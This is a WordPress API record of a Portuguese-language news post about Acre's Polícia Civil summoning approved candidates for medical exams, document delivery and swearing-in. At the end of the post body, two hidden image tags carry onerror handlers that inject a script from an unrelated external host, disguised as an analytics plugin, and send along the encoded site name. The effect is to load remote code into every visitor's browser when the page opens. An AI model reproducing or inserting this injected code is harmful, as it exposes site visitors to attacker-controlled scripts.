{"id":49444,"date":"2020-08-17T15:56:10","date_gmt":"2020-08-17T15:56:10","guid":{"rendered":"https:\/\/abarevegan.com.br\/index.php\/2020\/08\/17\/aprovados-em-concurso-da-policia-civil-sao-convocados\/"},"modified":"2020-08-17T15:56:10","modified_gmt":"2020-08-17T15:56:10","slug":"aprovados-em-concurso-da-policia-civil-sao-convocados","status":"publish","type":"post","link":"https:\/\/nk7-testes.com.br\/agazeta\/aprovados-em-concurso-da-policia-civil-sao-convocados\/","title":{"rendered":"Aprovados em concurso da Pol\u00edcia Civil s\u00e3o convocados"},"content":{"rendered":"<p style=\"text-align: justify;\"><span style=\"font-size: 13.2px;\">Documenta\u00e7\u00e3o ser\u00e1 entregue mediante agendamento<\/span><\/p>\n<p style=\"text-align: justify;\">A Secretaria de Estado de Planejamento e Gest\u00e3o (Seplag) publicou a convoca\u00e7\u00e3o para inspe\u00e7\u00e3o m\u00e9dica, entrega de documentos e posse, de cinco candidatos aprovados no concurso da Pol\u00edcia Civil, no Di\u00e1rio Oficial desta segunda-feira (17).<\/p>\n<p>Agentes, delegado e escriv\u00e3es foram convocados. Os laudos m\u00e9dicos devem ser entregues no dia 4 de setembro, das 8 \u00e0s 11 horas, na Unidade de Sa\u00fade Policl\u00ednica Tucum\u00e3, situada na Avenida Noroeste, Conjunto Tucum\u00e3, em Rio Branco.<\/p>\n<p style=\"text-align: justify;\">A documenta\u00e7\u00e3o deve ser entregue no dia 4 de setembro mediante agendamento de hor\u00e1rio, que deve ser feito por telefone (68) 3224-0977, no Audit\u00f3rio da Pol\u00edcia Civil, situado na Avenida Ant\u00f4nio da Rocha Viana, 1.294, Bosque. O detalhamento dos exames m\u00e9dicos e dos documentos pessoais solicitados pode ser conferido no edital n\u00ba 132.<\/p>\n<p style=\"text-align: justify;\">A posse ser\u00e1 realizada no dia 10 de setembro, \u00e0s 16h30 no Audit\u00f3rio da Pol\u00edcia Civil.&nbsp;Para mais informa\u00e7\u00f5es os candidatos podem entrar em contato com a Pol\u00edcia Civil por meio do n\u00famero (68) 3224-0977 ou junto \u00e0 Seplag, por meio do endere\u00e7o eletr\u00f4nico <a href=\"mailto:concursos.seplag@ac.gov.br.\">concursos.seplag@ac.gov.br.<\/a><\/p>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n","protected":false},"excerpt":{"rendered":"<p style=\"text-align: justify;\"><span style=\"font-size: 13.2px;\">Documenta\u00e7\u00e3o ser\u00e1 entregue mediante agendamento<\/span><\/p>\n","protected":false},"author":4,"featured_media":49443,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jnews-multi-image_gallery":[],"jnews_single_post":[],"jnews_primary_category":[],"jnews_social_meta":[],"jnews_review":[],"enable_review":"","type":"","name":"","summary":"","brand":"","sku":"","good":[],"bad":[],"score_override":"","override_value":"","rating":[],"price":[],"footnotes":""},"categories":[44],"tags":[],"class_list":["post-49444","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-policia"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Aprovados em concurso da Pol\u00edcia Civil s\u00e3o convocados - Agazeta.net<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/nk7-testes.com.br\/agazeta\/aprovados-em-concurso-da-policia-civil-sao-convocados\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Aprovados em concurso da Pol\u00edcia Civil s\u00e3o convocados - Agazeta.net\" \/>\n<meta property=\"og:description\" content=\"Documenta\u00e7\u00e3o ser\u00e1 entregue mediante agendamento\" \/>\n<meta property=\"og:url\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/aprovados-em-concurso-da-policia-civil-sao-convocados\/\" \/>\n<meta property=\"og:site_name\" content=\"Agazeta.net\" \/>\n<meta property=\"article:published_time\" content=\"2020-08-17T15:56:10+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/08\/17-08-20-policia-civil-aprovados-convocadao-gov.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"458\" \/>\n\t<meta property=\"og:image:height\" content=\"340\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Agazeta.Net\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Agazeta.Net\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/aprovados-em-concurso-da-policia-civil-sao-convocados\/\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/aprovados-em-concurso-da-policia-civil-sao-convocados\/\",\"name\":\"Aprovados em concurso da Pol\u00edcia Civil s\u00e3o convocados - Agazeta.net\",\"isPartOf\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/aprovados-em-concurso-da-policia-civil-sao-convocados\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/aprovados-em-concurso-da-policia-civil-sao-convocados\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/08\/17-08-20-policia-civil-aprovados-convocadao-gov.jpg\",\"datePublished\":\"2020-08-17T15:56:10+00:00\",\"author\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/ff6b39d54d6973bfc57f4140f659b23f\"},\"breadcrumb\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/aprovados-em-concurso-da-policia-civil-sao-convocados\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/nk7-testes.com.br\/agazeta\/aprovados-em-concurso-da-policia-civil-sao-convocados\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/aprovados-em-concurso-da-policia-civil-sao-convocados\/#primaryimage\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/08\/17-08-20-policia-civil-aprovados-convocadao-gov.jpg\",\"contentUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/08\/17-08-20-policia-civil-aprovados-convocadao-gov.jpg\",\"width\":458,\"height\":340,\"caption\":\"17-08-20-policia-civil-aprovados-convocadao-gov\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/aprovados-em-concurso-da-policia-civil-sao-convocados\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/nk7-testes.com.br\/agazeta\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Aprovados em concurso da Pol\u00edcia Civil s\u00e3o convocados\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/\",\"name\":\"Agazeta.net\",\"description\":\"Agazeta.net - Not\u00edcias de Rio Branco\/AC\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/ff6b39d54d6973bfc57f4140f659b23f\",\"name\":\"Agazeta.Net\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Aprovados em concurso da Pol\u00edcia Civil s\u00e3o convocados - Agazeta.net","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/nk7-testes.com.br\/agazeta\/aprovados-em-concurso-da-policia-civil-sao-convocados\/","og_locale":"pt_BR","og_type":"article","og_title":"Aprovados em concurso da Pol\u00edcia Civil s\u00e3o convocados - Agazeta.net","og_description":"Documenta\u00e7\u00e3o ser\u00e1 entregue mediante agendamento","og_url":"https:\/\/nk7-testes.com.br\/agazeta\/aprovados-em-concurso-da-policia-civil-sao-convocados\/","og_site_name":"Agazeta.net","article_published_time":"2020-08-17T15:56:10+00:00","og_image":[{"width":458,"height":340,"url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/08\/17-08-20-policia-civil-aprovados-convocadao-gov.jpg","type":"image\/jpeg"}],"author":"Agazeta.Net","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Agazeta.Net","Est. tempo de leitura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/nk7-testes.com.br\/agazeta\/aprovados-em-concurso-da-policia-civil-sao-convocados\/","url":"https:\/\/nk7-testes.com.br\/agazeta\/aprovados-em-concurso-da-policia-civil-sao-convocados\/","name":"Aprovados em concurso da Pol\u00edcia Civil s\u00e3o convocados - Agazeta.net","isPartOf":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website"},"primaryImageOfPage":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/aprovados-em-concurso-da-policia-civil-sao-convocados\/#primaryimage"},"image":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/aprovados-em-concurso-da-policia-civil-sao-convocados\/#primaryimage"},"thumbnailUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/08\/17-08-20-policia-civil-aprovados-convocadao-gov.jpg","datePublished":"2020-08-17T15:56:10+00:00","author":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/ff6b39d54d6973bfc57f4140f659b23f"},"breadcrumb":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/aprovados-em-concurso-da-policia-civil-sao-convocados\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/nk7-testes.com.br\/agazeta\/aprovados-em-concurso-da-policia-civil-sao-convocados\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/nk7-testes.com.br\/agazeta\/aprovados-em-concurso-da-policia-civil-sao-convocados\/#primaryimage","url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/08\/17-08-20-policia-civil-aprovados-convocadao-gov.jpg","contentUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/08\/17-08-20-policia-civil-aprovados-convocadao-gov.jpg","width":458,"height":340,"caption":"17-08-20-policia-civil-aprovados-convocadao-gov"},{"@type":"BreadcrumbList","@id":"https:\/\/nk7-testes.com.br\/agazeta\/aprovados-em-concurso-da-policia-civil-sao-convocados\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/nk7-testes.com.br\/agazeta\/"},{"@type":"ListItem","position":2,"name":"Aprovados em concurso da Pol\u00edcia Civil s\u00e3o convocados"}]},{"@type":"WebSite","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website","url":"https:\/\/nk7-testes.com.br\/agazeta\/","name":"Agazeta.net","description":"Agazeta.net - Not\u00edcias de Rio Branco\/AC","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Person","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/ff6b39d54d6973bfc57f4140f659b23f","name":"Agazeta.Net","url":"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/"}]}},"_links":{"self":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/49444","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/comments?post=49444"}],"version-history":[{"count":0,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/49444\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media\/49443"}],"wp:attachment":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media?parent=49444"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/categories?post=49444"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/tags?post=49444"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}